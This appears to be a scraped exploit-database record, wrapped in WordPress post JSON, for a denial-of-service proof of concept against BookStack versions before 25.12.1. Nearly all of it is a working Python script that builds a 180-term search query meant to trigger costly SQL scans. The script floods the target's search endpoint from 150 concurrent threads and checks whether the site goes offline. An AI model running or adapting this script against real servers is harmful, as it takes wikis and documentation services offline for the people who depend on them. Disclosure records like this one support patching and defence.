{“lastseen”:”2026-05-21T13:27:56″,”description”:”Exploit Title: BookStack 25.12.1 – Denial of Service Search Terms Resource Exhaustion Date: 2026-04-29 Exploit Author: Gabriel Rodrigues TEXUGO Vendor Homepage: https:\/\/www.bookstackapp.com Software Link: https:\/\/github.com\/BookStackApp\/BookStack…”,”published”:”2026-05-21T00:00:00″,”modified”:”2026-05-21T00:00:00″,”type”:”exploitdb”,”title”:”BookStack 25.12.1 – Denial of Service”,”source”:””,”references”:””,”id”:”EDB-ID:52571″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”# Exploit Title: BookStack 25.12.1 – Denial of Service \\r\\nSearch Terms (Resource Exhaustion)\\r\\n# Date: 2026-04-29\\r\\n# Exploit Author: Gabriel Rodrigues (TEXUGO)\\r\\n# Vendor Homepage: https:\/\/www.bookstackapp.com\\r\\n# Software Link: https:\/\/github.com\/BookStackApp\/BookStack\\r\\n# Version: \\u003c 25.12.1\\r\\n# Tested on: BookStack v25.12 (Docker) + PHP 8.3 + MySQL 8.0\\r\\n# CVE: Pending (Request ID: 1970573)\\r\\n# References:\\r\\n# https:\/\/www.bookstackapp.com\/blog\/bookstack-release-v25-12-1\/\\r\\n# https:\/\/github.com\/BookStackApp\/BookStack\/security\/advisories (if any)\\r\\n\\r\\n\\”\\”\\”\\r\\nBookStack DoS PoC\\r\\npython3 poc_dos_search.py http:\/\/localhost:8080 [cookie]\\r\\n\\”\\”\\”\\r\\n\\r\\nimport requests, sys, time\\r\\nfrom urllib.parse import quote\\r\\nfrom concurrent.futures import ThreadPoolExecutor\\r\\n\\r\\n# Payload: 100 termos + 50 exatos + 30 tags = 180 termos de busca\\r\\n# Gera query SQL com muitos OR LIKE, full table scans e subqueries\\r\\nPAYLOAD = \\” \\”.join([f\\”t{i}\\” for i in range(100)] + [f’\\”e{i}\\”‘ for i in range(50)] + [f\\”[t{i}=v{i}]\\” for i in range(30)])\\r\\nstop = False\\r\\n\\r\\ndef attack(url, headers):\\r\\n s = requests.Session()\\r\\n while not stop:\\r\\n try:\\r\\n s.get(url, headers=headers, timeout=30)\\r\\n except:\\r\\n pass\\r\\n\\r\\ndef main():\\r\\n global stop\\r\\n url = sys.argv[1].rstrip(\\”\/\\”)\\r\\n cookie = sys.argv[2] if len(sys.argv) \\u003e 2 else None\\r\\n search_url = f\\”{url}\/search?term={quote(PAYLOAD)}\\”\\r\\n headers = {\\”Cookie\\”: cookie} if cookie else {}\\r\\n \\r\\n print(f\\”[*] Query: {PAYLOAD[:80]}…\\”)\\r\\n print(f\\”[*] URL completa tem {len(search_url)} bytes\\”)\\r\\n print(f\\”[*] Atacando {url} com 150 threads por 30s\\\\n\\”)\\r\\n \\r\\n with ThreadPoolExecutor(150) as ex:\\r\\n [ex.submit(attack, search_url, headers) for _ in range(150)]\\r\\n \\r\\n for i in range(15):\\r\\n time.sleep(2)\\r\\n try:\\r\\n r = requests.get(url, timeout=3)\\r\\n print(f\\”[{(i+1)*2:2d}s] ONLINE – {r.status_code}\\”)\\r\\n except requests.exceptions.Timeout:\\r\\n print(f\\”[{(i+1)*2:2d}s] OFFLINE – TIMEOUT\\”)\\r\\n except:\\r\\n print(f\\”[{(i+1)*2:2d}s] OFFLINE – CONNECTION ERROR\\”)\\r\\n \\r\\n stop = True\\r\\n\\r\\nif __name__ == \\”__main__\\”:\\r\\n main()”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52571″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52571″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-21T13:27:56″,”description”:”Exploit Title: BookStack 25.12.1 – Denial of Service Search Terms Resource Exhaustion Date: 2026-04-29 Exploit Author: Gabriel Rodrigues TEXUGO Vendor Homepage: https:\/\/www.bookstackapp.com Software Link: https:\/\/github.com\/BookStackApp\/BookStack…”,”published”:”2026-05-21T00:00:00″,”modified”:”2026-05-21T00:00:00″,”type”:”exploitdb”,”title”:”BookStack…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,40,13,33,7,11,5],"class_list":["post-56068","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-exploitdb","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n